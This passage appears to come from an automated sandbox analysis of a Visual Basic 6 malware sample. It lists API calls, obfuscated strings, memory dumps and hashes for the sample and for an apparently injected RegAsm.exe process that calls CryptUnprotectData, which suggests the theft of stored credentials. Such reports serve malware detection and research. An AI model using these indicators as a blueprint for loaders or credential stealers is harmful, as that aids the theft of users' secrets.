                                                                      • __vbaFpI4.MSVBVM60(?,?,00000ACB,?), ref: 00412D21
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010F0,00410354,000002C8), ref: 00412D57
                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000002,00000002), ref: 00412D6D
                                                                      • __vbaNew2.MSVBVM60(004108BC,004145C0), ref: 00412D95
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,023A004C,004108AC,0000004C), ref: 00412DBA
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004108E8,0000001C,?,?,?,?), ref: 00412E0A
                                                                      • __vbaObjSet.MSVBVM60(?,?,?,?,?,?), ref: 00412E1B
                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00412E24
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010F0,00410384,000006F8), ref: 00412E4C
                                                                      • __vbaStrCopy.MSVBVM60 ref: 00412E5A
                                                                      • __vbaFreeStr.MSVBVM60 ref: 00412E93
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010F0,00410354,000002B4), ref: 00412EC0
                                                                      • __vbaStrToAnsi.MSVBVM60(?,SINGFEST,00267EEC), ref: 00412EDD
                                                                      • __vbaSetSystemError.MSVBVM60(000C5DB5,00000000), ref: 00412EF4
                                                                      • __vbaFreeStr.MSVBVM60 ref: 00412F13
                                                                      • __vbaNew2.MSVBVM60(004108BC,004145C0), ref: 00412F2C
                                                                      • __vbaLateMemCallLd.MSVBVM60(00000002,?,WkKauIFp5j1bv26pBJsl8jmR69NV785,00000000), ref: 00412F48
                                                                      • __vbaObjVar.MSVBVM60(00000000), ref: 00412F52
                                                                      • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00412F5D
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,023A004C,004108AC,0000000C), ref: 00412F77
                                                                      • __vbaFreeObj.MSVBVM60 ref: 00412F80
                                                                      • __vbaFreeVar.MSVBVM60 ref: 00412F89
                                                                      • __vbaFreeObj.MSVBVM60(00412FEA), ref: 00412FD4
                                                                      • __vbaFreeStr.MSVBVM60 ref: 00412FD9
                                                                      • __vbaFreeObj.MSVBVM60 ref: 00412FE2
                                                                      • __vbaFreeObj.MSVBVM60 ref: 00412FE7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.29963175007.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.29963131884.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963295972.0000000000414000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __vba$Free$CheckHresult$ErrorNew2System$AnsiMove$#575#612AddrefCallCopyLateList
                                                                      • String ID: Palmira$SINGFEST$WkKauIFp5j1bv26pBJsl8jmR69NV785$snappishly
                                                                      • API String ID: 1255662601-1278630523
                                                                      • Opcode ID: 549b60827e920eedba0eec8639b3ed821ef44e175e2498523b760d8efa285644
                                                                      • Instruction ID: f6b96e105d13d64ceb7cdb1f2ea9978f928e83ae26243f1649d855809936c206
                                                                      • Opcode Fuzzy Hash: 549b60827e920eedba0eec8639b3ed821ef44e175e2498523b760d8efa285644
                                                                      • Instruction Fuzzy Hash: 20D16B70900209EFDB10DFA0DE89ADEBBB9FF48704F10816AF545A72A1D7745985CF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004012C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.29963175007.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.29963131884.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963295972.0000000000414000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: #100
                                                                      • String ID: VB5!6!*
                                                                      • API String ID: 1341478452-2574520878
                                                                      • Opcode ID: 65bcabd2d3b2cfcce738f6ace49643eb3e149e76052b2364305ed67a51d6a320
                                                                      • Instruction ID: 4eed00bb182fb4e9760f5624f56705828db8982adf34c12508b44d950381b41b
                                                                      • Opcode Fuzzy Hash: 65bcabd2d3b2cfcce738f6ace49643eb3e149e76052b2364305ed67a51d6a320
                                                                      • Instruction Fuzzy Hash: D25161A680E7D14EE703877499652517FB0AE23214B1E46EBC4D1DF8F3D26D080AD76A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00413320, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #672.MSVBVM60(00000000,40080000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000), ref: 0041336C
                                                                      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 00413372
                                                                      • __vbaNew2.MSVBVM60(004108BC,004145C0,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 00413397
                                                                      • __vbaLateMemCallLd.MSVBVM60(?,?,qTu9tyktlIOgozvLrZMBbdZxTILvo43,00000000), ref: 004133B3
                                                                      • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 004133BD
                                                                      • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 004133C8
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,023A004C,004108AC,0000000C), ref: 004133E2
                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 004133EB
                                                                      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 004133F4
                                                                      • __vbaFreeObj.MSVBVM60(00413426), ref: 0041341F
                                                                      Strings
                                                                      • qTu9tyktlIOgozvLrZMBbdZxTILvo43, xrefs: 004133A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.29963175007.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.29963131884.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963295972.0000000000414000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __vba$Free$#672AddrefCallCheckHresultLateNew2
                                                                      • String ID: qTu9tyktlIOgozvLrZMBbdZxTILvo43
                                                                      • API String ID: 263512575-2009357870
                                                                      • Opcode ID: 36584572401e04012f78945e83adea8b1831ef180e897a26de6f6ac3869dc4d6
                                                                      • Instruction ID: 7a8fe742ff895f9b851228b7399f7d21353efe8e7ce09d9d37503a31ccbe14a6
                                                                      • Opcode Fuzzy Hash: 36584572401e04012f78945e83adea8b1831ef180e897a26de6f6ac3869dc4d6
                                                                      • Instruction Fuzzy Hash: 34214F70900245EBDB10AF95DE49FABBB78FB94B02F10442AF541B25A0D7781581CF6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00413010, Relevance: 12.1, APIs: 8, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __vbaAryConstruct2.MSVBVM60(?,00410968,00000005), ref: 0041304C
                                                                      • #682.MSVBVM60(?,?), ref: 0041308D
                                                                      • __vbaFpR8.MSVBVM60 ref: 00413093
                                                                      • __vbaFreeVar.MSVBVM60 ref: 004130B7
                                                                      • _adj_fdiv_m64.MSVBVM60 ref: 004130E9
                                                                      • __vbaFpI4.MSVBVM60(42FC0000,?,436E0000), ref: 00413117
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410354,000002C0,?,436E0000), ref: 0041314B
                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,00413176), ref: 0041316F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.29963175007.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.29963131884.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963295972.0000000000414000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __vba$#682CheckConstruct2DestructFreeHresult_adj_fdiv_m64
                                                                      • String ID:
                                                                      • API String ID: 4111779564-0
                                                                      • Opcode ID: f9306a69acf47cef25a353af5213d63752a5c7571344e3560a397993017aea1d
                                                                      • Instruction ID: 33a578bc5aba2e40f90e141480eeadbd3ff91af455526bef480b3debfbd54266
                                                                      • Opcode Fuzzy Hash: f9306a69acf47cef25a353af5213d63752a5c7571344e3560a397993017aea1d
                                                                      • Instruction Fuzzy Hash: 01318174D00248EBDB04CF91DE48BEEBBB8FB48701F10812AF541BA2A4C7B85985CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00413190, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 004131F4
                                                                      • __vbaInStr.MSVBVM60(00000000,Bebyrdelses9,Hvislendes8,FF96B5C0), ref: 0041320F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.29963175007.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.29963131884.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963295972.0000000000414000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __vba
                                                                      • String ID: Bebyrdelses9$Hvislendes8
                                                                      • API String ID: 3524132090-1996639642
                                                                      • Opcode ID: 6a0abc1d5a2de543b24974b2caca9fd62b173441c529924bae74daf47a8d6f90
                                                                      • Instruction ID: 9c73fb05ed69dc07260d5ffe9d4696bf8dbe35c1989c5c085c288ee580072a22
                                                                      • Opcode Fuzzy Hash: 6a0abc1d5a2de543b24974b2caca9fd62b173441c529924bae74daf47a8d6f90
                                                                      • Instruction Fuzzy Hash: 690148B0950258EBCB10EF98C989BDEBFB8BF08B04F24805AF544B6251D7B815858B99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00413250, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __vbaNew2.MSVBVM60(004108BC,004145C0), ref: 00413293
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,023A004C,004108AC,0000004C), ref: 004132B8
                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004108E8,00000028), ref: 004132D8
                                                                      • __vbaFreeObj.MSVBVM60 ref: 004132E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.29963175007.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.29963131884.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963295972.0000000000414000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __vba$CheckHresult$FreeNew2
                                                                      • String ID:
                                                                      • API String ID: 4261391273-0
                                                                      • Opcode ID: c2c956cce8ae0fb1c7abbef811d818e2b5e0fe525585c4d75af6ba34e555b409
                                                                      • Instruction ID: 81a809eaaed7dc680e9ce63a33d747393ba5a439aff1a2f19fcf1fdef59f5c17
                                                                      • Opcode Fuzzy Hash: c2c956cce8ae0fb1c7abbef811d818e2b5e0fe525585c4d75af6ba34e555b409
                                                                      • Instruction Fuzzy Hash: A9115174640205BBD700AF65DE49FDA7BF8FB18B01F104165FA45E32A0D7B859858BE8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: RegAsm.exe PID: 7244 Parent PID: 3432 RegAsm.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00A8C790, Relevance: 12.1, Strings: 9, Instructions: 885COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ok$(ok$(ok$(ok$(ok$(ok$(ok$,k$,k
                                                                      • API String ID: 0-3197148070
                                                                      • Opcode ID: af5ddd757da1d53f5d26aeca7939a3a1c9bdbbb776629d9375345f9160e804ec
                                                                      • Instruction ID: 6cc6561cb8826036216d7e8fac462afe29bf1411072d2f8c23e40ccca077de1f
                                                                      • Opcode Fuzzy Hash: af5ddd757da1d53f5d26aeca7939a3a1c9bdbbb776629d9375345f9160e804ec
                                                                      • Instruction Fuzzy Hash: D6823C31A00609DFCB14EF68C584AAEBBF2FF49324F158569E409AB2A1D771ED41CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A8BA30, Relevance: 8.4, Strings: 6, Instructions: 900COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ok$(ok$(ok$,k$,k$Hk
                                                                      • API String ID: 0-3241389771
                                                                      • Opcode ID: ebd4b46db604b76acfc096c0d2beb6382470f9c28fe12a3ae4cfa3f61c810598
                                                                      • Instruction ID: 30bcfa438b8a3ca9c68833acafa98552332bd0f11c16435c73f8cc380b0c813d
                                                                      • Opcode Fuzzy Hash: ebd4b46db604b76acfc096c0d2beb6382470f9c28fe12a3ae4cfa3f61c810598
                                                                      • Instruction Fuzzy Hash: 67728070A002199FCB14DF69C994AAEBBB2FF89314F158169E415EB3A1DB34EC41CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9BDAA0, Relevance: 7.0, Strings: 5, Instructions: 775COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'k$4'k$$k$$k$;k
                                                                      • API String ID: 0-2672301002
                                                                      • Opcode ID: c7d1528eaa98f15292e7863a2c8939f00d8ed3bb4f8e456985724233c6de0e46
                                                                      • Instruction ID: 37fef83a1196c640ce7829cccffc432d131577317c1c62107b7fa51a9bc1c7c9
                                                                      • Opcode Fuzzy Hash: c7d1528eaa98f15292e7863a2c8939f00d8ed3bb4f8e456985724233c6de0e46
                                                                      • Instruction Fuzzy Hash: 34426731B08215AFDB058B79C854BAEB7EAEF85310F15806EE505EB395DB35DC02C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C99AA00, Relevance: 6.8, Strings: 2, Instructions: 4336COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xk$Xk
                                                                      • API String ID: 0-2435460274
                                                                      • Opcode ID: ecc1a1d57e9221fd50f18820bf8f0909c632396a1eb7776914206f7772db20f6
                                                                      • Instruction ID: 910a12dd44ded741108c2006ad1e49b6e371ce487a2394671a3032b1a9c569d6
                                                                      • Opcode Fuzzy Hash: ecc1a1d57e9221fd50f18820bf8f0909c632396a1eb7776914206f7772db20f6
                                                                      • Instruction Fuzzy Hash: 2D837031D147598ADB10DF78C8806DDF7B5FF89700F51C6AAE448AB261EB30AAC5CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9BD2B8, Relevance: 4.3, Strings: 3, Instructions: 564COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \$\$\
                                                                      • API String ID: 0-3791832595
                                                                      • Opcode ID: 3278dfbfbf725c03275545852ad4d9fe0c9b1536b387b8dcea3a44e7bda496d6
                                                                      • Instruction ID: 0755273805262a1c7669f3b25fda56a82b51055cc867623d3a3c0f696b51607b
                                                                      • Opcode Fuzzy Hash: 3278dfbfbf725c03275545852ad4d9fe0c9b1536b387b8dcea3a44e7bda496d6
                                                                      • Instruction Fuzzy Hash: AF121131B04214ABDB14DBB5C954B6F76E7AF88744F25852CD50AAB3C8DF74AC0287E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A83A50, Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \Vm${|^${|^
                                                                      • API String ID: 0-253644615
                                                                      • Opcode ID: d1bc5a2455d9adc26a727d957cd23cb6c1fd5cbdc5ce83223079ea2474579af8
                                                                      • Instruction ID: 96c341c5811d5e73b218341d04a8869b01c0630c64ea22c3b1e1efab7d71877d
                                                                      • Opcode Fuzzy Hash: d1bc5a2455d9adc26a727d957cd23cb6c1fd5cbdc5ce83223079ea2474579af8
                                                                      • Instruction Fuzzy Hash: C3B14DB1E002098FDF14DFA9D8857EDBBF2BF88B04F14C529D815A7294EB749945CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C99AAE2, Relevance: 4.0, Strings: 1, Instructions: 2756COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 5b180382ef720871c1c9f561ff2016f5320c982ddd86b952b254d4066bbe68fa
                                                                      • Instruction ID: 8015931fd79508dd7693f85de82a23f3a4692f596934c6f9a1489c25b31ffd77
                                                                      • Opcode Fuzzy Hash: 5b180382ef720871c1c9f561ff2016f5320c982ddd86b952b254d4066bbe68fa
                                                                      • Instruction Fuzzy Hash: 69531D31D1565A8EDB11DF68C884A99F7B5FF99300F11C79AE4487B221EB30AAD4CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B54FC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 1C9B5CD5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID: {|^
                                                                      • API String ID: 834300711-4251809065
                                                                      • Opcode ID: 52c0388005a63f11fc5a6be5b1d42b06db019c8fa121788d71229c47cd0124b3
                                                                      • Instruction ID: 1496ff093a07c42c73a0bf3516b3bd9b7ef72d3e129b27e7d3073cc66323130d
                                                                      • Opcode Fuzzy Hash: 52c0388005a63f11fc5a6be5b1d42b06db019c8fa121788d71229c47cd0124b3
                                                                      • Instruction Fuzzy Hash: 141126B2800249DFCB10CF99C944BEEBBF5EF88320F14841AEA54A7251C375A951CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B5C68, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 1C9B5CD5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID: {|^
                                                                      • API String ID: 834300711-4251809065
                                                                      • Opcode ID: dd1a60a1b89f61b216a6700fd464cade2155573d8467b9e757f1984d31e30218
                                                                      • Instruction ID: 198414e5b3677f08e689e15c07c8ad6c7109b4f88f68d6b1a706df9c2271fe88
                                                                      • Opcode Fuzzy Hash: dd1a60a1b89f61b216a6700fd464cade2155573d8467b9e757f1984d31e30218
                                                                      • Instruction Fuzzy Hash: D81167B2800249DFCB00CF99C944BEEBFF4EF48320F14841AE654A7611C339A550CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A84320, Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {|^${|^
                                                                      • API String ID: 0-4267019200
                                                                      • Opcode ID: 2039c29d68d2a32f6b779edcff8bfbed605d8413b2ed26a6b4d60d407878e967
                                                                      • Instruction ID: 39d028a5237966492fc1313c2e32ecff71acf845473ab57fd6084e7ed05632a4
                                                                      • Opcode Fuzzy Hash: 2039c29d68d2a32f6b779edcff8bfbed605d8413b2ed26a6b4d60d407878e967
                                                                      • Instruction Fuzzy Hash: 65B14F70E0021ACFDF14DFA9D8817DDBBF2AF88718F148529D815EB294EB749845CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A81130, Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xk$$k
                                                                      • API String ID: 0-4279434961
                                                                      • Opcode ID: 748593602a914abd01b6b3c54adb4338c1b1324801ab7559159087d13be01ffd
                                                                      • Instruction ID: 2a5e9bf22b64b17d90aae9311abeaa9d0d9c2f4dfa9757689ea9c2720a171159
                                                                      • Opcode Fuzzy Hash: 748593602a914abd01b6b3c54adb4338c1b1324801ab7559159087d13be01ffd
                                                                      • Instruction Fuzzy Hash: 0F819274B083288BDB48EBB9849467E77BBBFC8304B15852DE547EB784DF3498028795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A86950, Relevance: 2.5, APIs: 1, Instructions: 955libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e7f5b392c05122d7952121ad9f07dde8c9732507ca7ea0b1b0ea796735a76b63
                                                                      • Instruction ID: 29cf72b9e3397cd41e144e39d83e3097e62aed7aef6d47ba75369c8910bbd971
                                                                      • Opcode Fuzzy Hash: e7f5b392c05122d7952121ad9f07dde8c9732507ca7ea0b1b0ea796735a76b63
                                                                      • Instruction Fuzzy Hash: 9BA208B4A05228CFCB64EF74C88869DB7B6BF48305F2041EAD90AA3754DB359E85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9BEDB8, Relevance: 2.0, Strings: 1, Instructions: 770COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $k
                                                                      • API String ID: 0-2968510180
                                                                      • Opcode ID: 56ec4ae0e317f2cd2c168c48c2cdf63c80249c24c84f2e400374f22a955ce248
                                                                      • Instruction ID: 2f5a4cff329f5a9491252154803574888aced77f4d5b9cc501057f54dc881fe1
                                                                      • Opcode Fuzzy Hash: 56ec4ae0e317f2cd2c168c48c2cdf63c80249c24c84f2e400374f22a955ce248
                                                                      • Instruction Fuzzy Hash: 52625D74A012289FCB14EB74C998BADB7B2BF88240F1485A8D50AEB354DF35ED468F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9BED5A, Relevance: 2.0, Strings: 1, Instructions: 764COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $k
                                                                      • API String ID: 0-2968510180
                                                                      • Opcode ID: 2bdb35fe667f2b6c7e57af41c0daf1902e5b8979be7f131f9d653c05711a5eec
                                                                      • Instruction ID: d749f775eb57c3e224da912d63618386e3f43a2a8bcc10f1ca60c2b4f79e6bb4
                                                                      • Opcode Fuzzy Hash: 2bdb35fe667f2b6c7e57af41c0daf1902e5b8979be7f131f9d653c05711a5eec
                                                                      • Instruction Fuzzy Hash: 58625C74A012289FCB14EB74C998BADBBB2BF88240F1485A8D509EB350DF35ED46CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A46988, Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497025472.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {|^
                                                                      • API String ID: 0-4251809065
                                                                      • Opcode ID: b5ca1dc899fdef7096bf847f23524df3ae791905f30aef5af6ee76dcd0c28619
                                                                      • Instruction ID: 1c5210e93df417a018b445a5666d604d6a5025e6a1680c7c4d90d433dfa967fd
                                                                      • Opcode Fuzzy Hash: b5ca1dc899fdef7096bf847f23524df3ae791905f30aef5af6ee76dcd0c28619
                                                                      • Instruction Fuzzy Hash: 41F16C38A00219CFDB14CFA9C985BADBBF2FF89314F15C529D409AB2A1DB71AD45CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9971E0, Relevance: 1.1, Instructions: 1102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d83c9bcf53b5fd3a0134311205f9d60cbf824119a5e62faa8a40c05df4af3637
                                                                      • Instruction ID: 6c993cbb2bdc2d647804079e4a7e40777cece017a88c66362c3bad25067d248e
                                                                      • Opcode Fuzzy Hash: d83c9bcf53b5fd3a0134311205f9d60cbf824119a5e62faa8a40c05df4af3637
                                                                      • Instruction Fuzzy Hash: 7E926934B012188FDB54DBB5C8947AEB7F2AF89340F2484ADD90AAB394DF75AC41CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C999868, Relevance: .8, Instructions: 760COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e2140726a26d74e91b56c01ed3210c7469458dfc7bb8b38ebd57182e687d0c04
                                                                      • Instruction ID: 4bd492ba743a59feb24ea6ab5cd59a64bbe61e69c1e879f2c14f327200307c4b
                                                                      • Opcode Fuzzy Hash: e2140726a26d74e91b56c01ed3210c7469458dfc7bb8b38ebd57182e687d0c04
                                                                      • Instruction Fuzzy Hash: 01623A34E046288FCB14DF79C89469EB7F2AF89344F1185A9D54AAB350EF30AD85CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B19B0, Relevance: .7, Instructions: 658COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4165da3713dd355e5c156ba8a34035fed7f2c366522b0ef140900dcaacd70151
                                                                      • Instruction ID: 3871120c666d9bd211f45bec8547940f7fd6fa51489116293cc96d4cfaf3807e
                                                                      • Opcode Fuzzy Hash: 4165da3713dd355e5c156ba8a34035fed7f2c366522b0ef140900dcaacd70151
